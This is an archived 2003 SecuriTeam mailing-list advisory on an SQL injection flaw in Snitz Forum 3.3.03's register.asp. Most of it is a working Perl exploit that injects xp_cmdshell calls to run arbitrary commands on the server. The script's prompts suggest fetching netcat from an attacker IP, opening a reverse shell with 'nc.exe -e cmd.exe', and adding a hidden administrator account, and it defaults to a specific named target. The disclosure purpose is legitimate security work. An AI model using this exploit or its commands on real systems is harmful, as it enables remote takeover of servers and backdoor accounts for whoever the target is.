[NT] Snitz Forum SQL Injection Vulnerability (register.asp)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/03

Next message: SecuriTeam: "[NT] Internet Explorer Program Execution (Flooding)"

Previous message: SecuriTeam: "[NT] Buffer Overflow in AnalogX Proxy (Long URL)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 26 May 2003 19:11:01 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

Snitz Forum SQL Injection Vulnerability (register.asp)
------------------------------------------------------------------------

SUMMARY

Snitz Forums has been found to contain an SQL injection vulnerability in
its "register.asp" page, specifically in its "Email" variable. The
vulnerability occurs because the "register.asp" page doesn't check user
input, this in turn will allow them to insert malicious SQL statements,
and in turn use them to execute stored procedures (such as "xp_cmdshell")
to arbitrarily run non-interactive commands on the system.

DETAILS

Vulnerable systems:
* Snitz Forum version 3.3.03

Immune systems:
* Snitz Forum version 3.4.03

Exploit:
#!/usr/bin/perl

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and
probably others).\n";
print "You accept full responsibility for your actions by using this
script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r
/add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;

if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
  print "Error connecting to $webserver\n";
  exit( 0 );
}
else
{
  my $data1 = $path . "\?mode\=DoIt";
  my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command.
"\'\%20--\&Name\=snitz";
  my $length = length( $data2 );

  print FILEHANDLE "POST $data1 HTTP/1.1\n";
  if( $port == 80 )
  {
    print FILEHANDLE "Host: $webserver\n";
  }
  else
  {
    print FILEHANDLE "Host: $webserver:$port\n";
  }
  print FILEHANDLE "Accept: */*\n";
  print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0)\n";
  print FILEHANDLE "Keep-Alive: 300\n";
  print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
  print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
  print FILEHANDLE "Content-Length: $length\n\n";
  print FILEHANDLE "$data2";

print "\nSQL injection command sent. If you are waiting for a shell on
your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

close( FILEHANDLE );
}

sub open_TCP
{
my( $FS, $dest, $port ) = @_;

  my $proto = getprotobyname( 'tcp' );
  socket( $FS, PF_INET, SOCK_STREAM, $proto );
  my $sin = sockaddr_in( $port, inet_aton( $dest ));
  connect( $FS, $sin ) || return undef;

  my $old_fh = select( $FS );
  $| = 1;
  select( $old_fh );
  return 1;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:sharpiemarker@hushmail.com>
sharpie marker.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] Internet Explorer Program Execution (Flooding)"

Previous message: SecuriTeam: "[NT] Buffer Overflow in AnalogX Proxy (Long URL)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[Full-disclosure] LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
... LAN.FS Messenger v2.4 - Command Execution Vulnerability ... The Vulnerability Laboratory Research Team discovered a command execution vulnerability in the official LAN.FS v2.4 Messenger Software. ...
(Full-Disclosure)
[Full-Disclosure] CSA-200402-1: Previous Open Webmail vulnerability is exploitable
... Vulnerability: Remote arbitrary command exection ... "Open WebMail is a webmail system based on the Neomail version 1.14 ... -p The port to have the reverse shellcode connect back to. ...
(Full-Disclosure)
[EXPL] Winhlp32.exe Buffer Overflow Exploit Code
... The perl script takes a command to execute ... Kernell32 jmp ebx 77E87793 ... chomp $outputfile; ...
(Securiteam)
Re: [Full-disclosure] GIMP Scriptfu Python Remote Command Execution
... There is an arbitrary command execution vulnerability in the scriptfu ... GIMP 2.6 branch ...
(Full-Disclosure)
iDefense Security Advisory 01.10.11: HP Network Node Manager Command Injection Vulnerability
... HP Network Node Manager Command Injection Vulnerability HP Network Node ... NNM runs on a variety of platforms, ...
(Bugtraq)